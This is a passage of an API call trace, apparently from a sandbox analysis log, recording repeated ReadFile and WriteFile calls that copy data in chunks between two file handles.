lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.460] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.462] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x171, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.467] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.468] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x209, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x227, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.476] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.477] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.478] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.479] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x397, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x174, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.484] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.486] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.488] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.489] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.489] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.491] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.493] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.494] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x394, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.495] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.498] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.499] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.502] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.504] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.505] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 